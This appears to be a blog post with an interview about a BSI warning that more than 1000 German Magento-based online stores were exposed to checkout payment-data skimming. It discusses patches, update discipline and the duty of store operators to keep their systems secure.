Barely six months after the last BSI (Federal Office for Information Security) security vulnerability warning, a new warning has been issued, which states that several Magento-based online stores in Germany are at risk. What’s going on?
As far as the current security issue is concerned, the talk is of more than 1000 online stores being affected just in Germany. But how come that the most recent analysis has once again revealed serious flaws in some Magento-based stores? Mind you, the most recent analysis was conducted in September 2016, which is why one is now less likely to find any more weak points, given that many stores took action in their own interests and the software service providers issued detailed notifications and provided comprehensive assistance. One point that should be clarified is that the store system providers are not to blame, but rather operators themselves. The BSI emphasized this point several times in its press release. In actual fact the last analysis involved customer payment data skimming, made possible by proven deficiencies in the stores based to some extent on the use of older store system versions.
So what’s the story with Magento-based stores operated by German online print providers? As far as IT security is concerned, most of the Magento users involved in online print are certainly better off and more up-to-date than the majority of store operators that aren’t active in a media environment. But in order to provide the community and us as a team with some clarity about what the software service providers are undertaking to restore and maintain security on the websites that they look after, I asked Alexander Sperrfechter, CEO of rissc, a few questions. Remarkably other providers didn’t want to make any statements.
Bernd Zipper: How are you tackling the current security problems?
Alexander Sperrfechter: We are doing our best to react as quickly as possible at all times and to install the security patches provided by Magento.
Bernd Zipper: Are there already any estimates as to how much payment data has been skimmed off?
Alexander Sperrfechter: This question is a tough one to answer, given that the online stores affected were barely aware that they had been attacked. Even if store operators themselves don’t save any credit card data in their stores, hackers can steal checkout input data by infiltrating source codes into the store system. This is exactly what happened in the case described by the BSI.
Bernd Zipper: Were there enough software updates available?
Alexander Sperrfechter: Magento already reacted back in October to illegal credit card data mining by issuing a security patch (SUPEE-8788). Users were also informed about the security patch and the urgency of action by newsletter and by Magento’s administration team.
Bernd Zipper: What lessons need to be learned from this incident – how will matters of security be handled in future?
Alexander Sperrfechter: Generally speaking store operators have different options that will enable them to protect their systems against attack in future. Standard solutions include the use of SSL or making administration access more difficult by enforcing IP restrictions or two-factor authentication. However these mechanisms would not have been effective in the case of the security vulnerability mentioned by the BSI, since the cyber-attack occurred at the checkout stage. Here it is vital to configure the development process to ensure that security updates are handled with the utmost priority.
“It’s a shame that the negligence – to some extent even ignorance – of some store operators in relation to handling existing updates is causing some customers to doubt the reputation or integrity of eCommerce systems. That’s because it’s the customer that ultimately suffers any personal financial loss.” – Bernd Zipper
And what can online print providers now do to screen their stores for any security vulnerabilities? Byte provides an online check tool for this purpose, which enables the security of the specified website to be checked and if necessary details potential remedial action options.
My take: It’s their own fault, is all I can say – at least as far as store operators and their losses are concerned. It is a real pity that carelessness in handling sensitive customer data is apparently still so widespread – that is not a Magento-specific issue! It is actually stating the obvious that store operators need to keep their eCommerce systems, irrespective of who the provider is, updated for security reasons as well. I say actually, because many store operators don’t take the time to install security patches and just continue using outdated versions. But according to the law (§13 German Teleservices Act), they are obliged to do so. Given the widespread use of Magento that can also “reflect badly” on online print stores, if customers regard online buying as less secure… especially in the B2B sector.